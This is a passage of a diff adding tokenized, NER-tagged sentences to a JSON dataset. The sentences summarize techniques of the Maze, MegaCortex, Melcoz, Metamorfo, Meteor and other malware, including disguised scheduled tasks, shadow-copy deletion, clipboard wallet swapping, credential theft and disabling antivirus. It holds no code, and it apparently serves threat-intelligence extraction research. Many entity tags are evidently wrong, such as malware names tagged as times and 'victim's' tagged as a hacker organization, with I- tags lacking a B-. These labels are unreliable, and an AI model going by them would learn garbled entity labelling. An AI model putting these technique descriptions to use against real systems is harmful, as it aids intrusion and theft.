"O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "created", + "scheduled", + "tasks", + "using", + "name", + "variants", + "such", + "as", + "\"Windows", + "Update", + "Security\",", + "\"Windows", + "Update", + "Security", + "Patches\",", + "and", + "\"Google", + "Chrome", + "Security", + "Update\",", + "to", + "launch", + "Maze", + "at", + "a", + "specific", + "time." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "stopped", + "SQL", + "services", + "to", + "ensure", + "it", + "can", + "encrypt", + "any", + "database." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "checked", + "the", + "language", + "of", + "the", + "infected", + "system", + "using", + "the", + "\"GetUSerDefaultUILanguage\"", + "function." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "checked", + "the", + "language", + "of", + "the", + "machine", + "with", + "function", + "<code>GetUserDefaultUILanguage</code>", + "and", + "terminated", + "execution", + "if", + "the", + "language", + "matches", + "with", + "an", + "entry", + "in", + "the", + "predefined", + "list." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "used", + "the", + "\"WNetOpenEnumW\",", + "\"WNetEnumResourceW”,", + "“WNetCloseEnum”", + "and", + "“WNetAddConnection2W”", + "functions", + "to", + "enumerate", + "the", + "network", + "resources", + "on", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "issued", + "a", + "shutdown", + "command", + "on", + "a", + "victim", + "machine", + "that,", + "upon", + "reboot,", + "will", + "run", + "the", + "ransomware", + "within", + "a", + "VM." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "communicated", + "to", + "hard-coded", + "IP", + "addresses", + "via", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "Maze", + "encryption", + "process", + "has", + "used", + "batch", + "scripts", + "with", + "various", + "commands." + ], + "ner_tags": [ + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "used", + "WMI", + "to", + "attempt", + "to", + "delete", + "the", + "shadow", + "volumes", + "on", + "a", + "machine,", + "and", + "to", + "connect", + "a", + "virtual", + "machine", + "to", + "the", + "network", + "domain", + "of", + "the", + "victim", + "organization's", + "network." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MechaFlounder", + "has", + "the", + "ability", + "to", + "send", + "the", + "compromised", + "user's", + "account", + "name", + "and", + "hostname", + "within", + "a", + "URL", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MechaFlounder", + "has", + "the", + "ability", + "to", + "upload", + "and", + "download", + "files", + "to", + "and", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MechaFlounder", + "has", + "been", + "downloaded", + "as", + "a", + "file", + "named", + "lsass.exe,", + "which", + "matches", + "the", + "legitimate", + "Windows", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MechaFlounder", + "uses", + "a", + "python-based", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "MechaFlounder", + "has", + "the", + "ability", + "to", + "use", + "base16", + "encoded", + "strings", + "in", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MechaFlounder", + "has", + "the", + "ability", + "to", + "identify", + "the", + "username", + "and", + "hostname", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MechaFlounder", + "has", + "the", + "ability", + "to", + "use", + "HTTP", + "in", + "communication", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MechaFlounder", + "has", + "the", + "ability", + "to", + "run", + "commands", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MegaCortex", + "can", + "enable", + "<code>SeDebugPrivilege</code>", + "and", + "adjust", + "token", + "privileges." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "MegaCortex", + "has", + "changed", + "user", + "account", + "passwords", + "and", + "logged", + "users", + "off", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MegaCortex", + "has", + "used", + "code", + "signing", + "certificates", + "issued", + "to", + "fake", + "companies", + "to", + "bypass", + "security", + "controls." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MegaCortex", + "has", + "used", + "the", + "open-source", + "library,", + "Mbed", + "Crypto,", + "and", + "generated", + "AES", + "keys", + "to", + "carry", + "out", + "the", + "file", + "encryption", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Tool", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MegaCortex", + "has", + "used", + "a", + "Base64", + "key", + "to", + "decode", + "its", + "components." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MegaCortex", + "was", + "used", + "to", + "kill", + "endpoint", + "security", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "MegaCortex", + "can", + "wipe", + "deleted", + "data", + "from", + "all", + "drives", + "using", + "<code>cipher.exe</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "MegaCortex", + "loads", + "<code>injecthelper.dll</code>", + "into", + "a", + "newly", + "created", + "<code>rundll32.exe</code>", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "MegaCortex", + "can", + "parse", + "the", + "available", + "drives", + "and", + "directories", + "to", + "determine", + "which", + "files", + "to", + "encrypt." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MegaCortex", + "has", + "deleted", + "volume", + "shadow", + "copies", + "using", + "<code>vssadmin.exe</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "MegaCortex", + "has", + "added", + "entries", + "to", + "the", + "Registry", + "for", + "ransom", + "contact", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "escalating", + "privileges,", + "MegaCortex", + "calls", + "<code>TerminateProcess()</code>,", + "<code>CreateRemoteThread</code>,", + "and", + "other", + "Win32", + "APIs." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MegaCortex", + "has", + "used", + "<code>rundll32.exe</code>", + "to", + "load", + "a", + "DLL", + "for", + "file", + "encryption." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MegaCortex", + "can", + "stop", + "and", + "disable", + "services", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MegaCortex", + "has", + "checked", + "the", + "number", + "of", + "CPUs", + "in", + "the", + "system", + "to", + "avoid", + "being", + "run", + "in", + "a", + "sandbox", + "or", + "emulator." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MegaCortex", + "has", + "used", + "<code>.cmd</code>", + "scripts", + "on", + "the", + "victim's", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Melcoz", + "has", + "been", + "distributed", + "through", + "an", + "AutoIt", + "loader", + "script." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Melcoz", + "can", + "monitor", + "the", + "victim's", + "browser", + "for", + "online", + "banking", + "sessions", + "and", + "display", + "an", + "overlay", + "window", + "to", + "manipulate", + "the", + "session", + "in", + "the", + "background." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Melcoz", + "can", + "monitor", + "content", + "saved", + "to", + "the", + "clipboard." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Melcoz", + "has", + "the", + "ability", + "to", + "steal", + "credentials", + "from", + "web", + "browsers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Melcoz", + "can", + "use", + "DLL", + "hijacking", + "to", + "bypass", + "security", + "controls." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Melcoz", + "has", + "the", + "ability", + "to", + "download", + "additional", + "files", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Melcoz", + "has", + "gained", + "execution", + "through", + "victims", + "opening", + "malicious", + "links." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Melcoz", + "can", + "use", + "MSI", + "files", + "with", + "embedded", + "VBScript", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Melcoz", + "has", + "been", + "packed", + "with", + "VMProtect", + "and", + "Themida." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Melcoz", + "has", + "been", + "spread", + "through", + "malicious", + "links", + "embedded", + "in", + "e-mails." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Melcoz", + "can", + "monitor", + "the", + "clipboard", + "for", + "cryptocurrency", + "addresses", + "and", + "change", + "the", + "intended", + "address", + "to", + "one", + "controlled", + "by", + "the", + "adversary." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Melcoz", + "can", + "use", + "VBS", + "scripts", + "to", + "execute", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "can", + "enumerate", + "all", + "windows", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo's", + "C2", + "communication", + "has", + "been", + "encrypted", + "using", + "OpenSSL." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "automatically", + "collected", + "mouse", + "clicks,", + "continuous", + "screenshots", + "on", + "the", + "machine,", + "and", + "set", + "timers", + "to", + "collect", + "the", + "contents", + "of", + "the", + "clipboard", + "and", + "website", + "browsing." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "a", + "function", + "to", + "hijack", + "data", + "from", + "the", + "clipboard", + "by", + "monitoring", + "the", + "contents", + "of", + "the", + "clipboard", + "and", + "replacing", + "the", + "cryptocurrency", + "wallet", + "with", + "the", + "attacker's." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "digitally", + "signed", + "executables", + "using", + "AVAST", + "Software", + "certificates." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "side-loaded", + "its", + "malicious", + "DLL", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "used", + "YouTube", + "to", + "store", + "and", + "hide", + "C&C", + "server", + "domains." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Upon", + "execution,", + "Metamorfo", + "has", + "unzipped", + "itself", + "after", + "being", + "downloaded", + "to", + "the", + "system", + "and", + "has", + "performed", + "string", + "decryption." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "a", + "function", + "to", + "kill", + "processes", + "associated", + "with", + "defenses", + "and", + "can", + "prevent", + "certain", + "processes", + "from", + "launching." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "injected", + "a", + "malicious", + "DLL", + "into", + "the", + "Windows", + "Media", + "Player", + "process", + "(wmplayer.exe)." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "encrypted", + "payloads", + "and", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "can", + "send", + "the", + "data", + "it", + "collects", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "deleted", + "itself", + "from", + "the", + "system", + "after", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "searched", + "the", + "Program", + "Files", + "directories", + "for", + "specific", + "folders", + "and", + "has", + "searched", + "for", + "strings", + "related", + "to", + "its", + "mutexes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "displayed", + "fake", + "forms", + "on", + "top", + "of", + "banking", + "sites", + "to", + "intercept", + "credentials", + "from", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "hidden", + "its", + "GUI", + "using", + "the", + "ShowWindow()", + "WINAPI", + "call." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "a", + "command", + "to", + "delete", + "a", + "Registry", + "key", + "it", + "uses,", + "<code>\\Software\\Microsoft\\Internet", + "Explorer\\notes</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "used", + "MSI", + "files", + "to", + "download", + "additional", + "files", + "to", + "execute." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "includes", + "payloads", + "written", + "in", + "JavaScript." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "a", + "command", + "to", + "launch", + "a", + "keylogger", + "and", + "capture", + "keystrokes", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "requires", + "the", + "user", + "to", + "double-click", + "the", + "executable", + "to", + "run", + "the", + "malicious", + "HTA", + "file", + "or", + "to", + "download", + "a", + "malicious", + "installer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "disguised", + "an", + "MSI", + "file", + "as", + "the", + "Adobe", + "Acrobat", + "Reader", + "Installer", + "and", + "has", + "masqueraded", + "payloads", + "as", + "OneDrive,", + "WhatsApp,", + "or", + "Spotify,", + "for", + "example." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "written", + "process", + "names", + "to", + "the", + "Registry,", + "disabled", + "IE", + "browser", + "features,", + "deleted", + "Registry", + "keys,", + "and", + "changed", + "the", + "ExtendedUIHoverTime", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-HackOrg", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "used", + "mshta.exe", + "to", + "execute", + "a", + "HTA", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "used", + "MsiExec.exe", + "to", + "automatically", + "execute", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "used", + "native", + "WINAPI", + "calls." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "used", + "raw", + "TCP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "communicated", + "with", + "hosts", + "over", + "raw", + "TCP", + "on", + "port", + "9999." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "downloaded", + "a", + "zip", + "file", + "for", + "execution", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "performed", + "process", + "name", + "checks", + "and", + "has", + "monitored", + "applications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "configured", + "persistence", + "to", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run,", + "Spotify", + "=%", + "APPDATA%\\Spotify\\Spotify.exe</code>", + "and", + "used", + ".LNK", + "files", + "in", + "the", + "startup", + "folder", + "to", + "achieve", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "can", + "collect", + "screenshots", + "of", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "collects", + "a", + "list", + "of", + "installed", + "antivirus", + "software", + "from", + "the", + "victim’s", + "system." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "had", + "used", + "AutoIt", + "to", + "load", + "and", + "execute", + "the", + "DLL", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "searched", + "the", + "compromised", + "system", + "for", + "banking", + "applications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "used", + "VMProtect", + "to", + "pack", + "and", + "protect", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "been", + "delivered", + "to", + "victims", + "via", + "emails", + "with", + "malicious", + "HTML", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "encrypted", + "C2", + "commands", + "with", + "AES-256." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "collected", + "the", + "hostname", + "and", + "operating", + "system", + "version", + "from", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "collected", + "the", + "username", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "uses", + "JavaScript", + "to", + "get", + "the", + "system", + "time." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "a", + "function", + "that", + "can", + "watch", + "the", + "contents", + "of", + "the", + "system", + "clipboard", + "for", + "valid", + "bitcoin", + "addresses,", + "which", + "it", + "then", + "overwrites", + "with", + "the", + "attacker's", + "address." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "embedded", + "a", + "\"vmdetect.exe\"", + "executable", + "to", + "identify", + "virtual", + "machines", + "at", + "the", + "beginning", + "of", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "used", + "VBS", + "code", + "on", + "victims’", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Metamorfo", + "has", + "used", + "<code>cmd.exe", + "/c</code>", + "to", + "execute", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "has", + "the", + "ability", + "to", + "change", + "the", + "password", + "of", + "local", + "users", + "on", + "compromised", + "hosts", + "and", + "can", + "log", + "off", + "users." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "can", + "use", + "Wevtutil", + "to", + "remove", + "Security,", + "System", + "and", + "Application", + "Event", + "Viewer", + "logs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "can", + "fill", + "a", + "victim's", + "files", + "and", + "directories", + "with", + "zero-bytes", + "in", + "replacement", + "of", + "real", + "content", + "before", + "deleting", + "them." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "can", + "attempt", + "to", + "uninstall", + "Kaspersky", + "Antivirus", + "or", + "remove", + "the", + "Kaspersky", + "license;", + "it", + "can", + "also", + "add", + "all", + "files", + "and", + "folders", + "related", + "to", + "the", + "attack", + "to", + "the", + "Windows", + "Defender", + "exclusion", + "list." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + 